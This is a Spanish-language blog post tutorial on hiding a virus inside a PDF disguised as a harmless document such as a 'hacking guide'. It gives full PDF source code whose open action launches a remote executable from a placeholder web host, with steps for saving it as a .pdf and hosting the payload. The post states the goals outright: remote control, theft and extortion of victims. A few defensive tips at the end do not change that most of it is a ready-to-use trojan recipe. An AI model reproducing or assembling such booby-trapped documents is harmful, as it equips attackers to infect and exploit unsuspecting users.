Muy buenas, aquí les mostraré brevemente cómo ocultar un virus dentro de un documento "Amigable".
Estos métodos son usados por algunas personas maliciosas para tener el control de un usuario desde cualquier parte, robar su información, descargarle sus archivos, crearle otros, luego extorsionarlo entre otras actividades delictivas.
Normalmente estos PDF viene camuflados como "Guías de Hacking" o cosas demasiado buenas para ser verdad (OJO que no todas estas guías traerán virus claro está).
Este tutorial en realidad será muy sencillo, copiar y pegar un código, y editarle ciertas cosas.
Primero antes que nada creamos un archivo .txt en cualquier parte de nuestro equipo y le ubicaremos el siguiente código:
%PDF-1.11 0 obj<</Type /Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 8 0 R>>endobj2 0 obj<</Type /Outlines/Count 0>>endobj3 0 obj<</Type /Pages/Kids [4 0 R]/Count 1>>endobj4 0 obj<</Type /Page/Parent 3 0 R/MediaBox [0 0 612 792]/Contents 5 0 R/Resources<< /ProcSet 6 0 R/Font << /F1 7 0 R >>>>>>endobj5 0 obj<< /Length 46 >>streamBT/F1 24 Tf100 700 Td(Aquí se deberá poner todo el texto que llevará el PDF)TjETendstreamendobj6 0 obj[/PDF /Text]endobj7 0 obj<</Type /Font/Subtype /Type1/Name /F1/BaseFont /Helvetica/Encoding /MacRomanEncoding>>endobj8 0 obj<</Type /Action/S /Launch/Win<</F (http://www.host/nombre.exe)>>>>endobjxref0 90000000000 65535 f0000000012 00000 n0000000109 00000 n0000000165 00000 n0000000234 00000 n0000000401 00000 n0000000505 00000 n0000000662 00000 ntrailer<</Size 9/Root 1 0 R>>startxref751%%EOF
Ahora veremos que las lineas que se van a modificar (Principalmente, en realidad puedes modificar lo que quieras), estarán en azul.
Bien, cuando tengamos todo editado guardaremos ese ,txt como un .pdf, de esta manera se creará un PDF con el contenido que le hemos editado en el código.
En el lugar donde dice www.host,etc.... deberán de ubicar un host web donde hayan alojado el archivo Virus (Pronto habrá un tutorial de eso).
¿Cómo me protejo de esto?
* Ver a qué páginas intenta acceder algún archivo que descarguemos.
* Tener un buen Firewall.
* No descargar cualquier archivo que prometa grandes cosas por Internet,
* De ser posible nunca manejar archivos de Hacking en tu computadora de uso normal, mejor tener todo en una máquina virtual.
- Cuculmeca
0 comentarios:
Publicar un comentario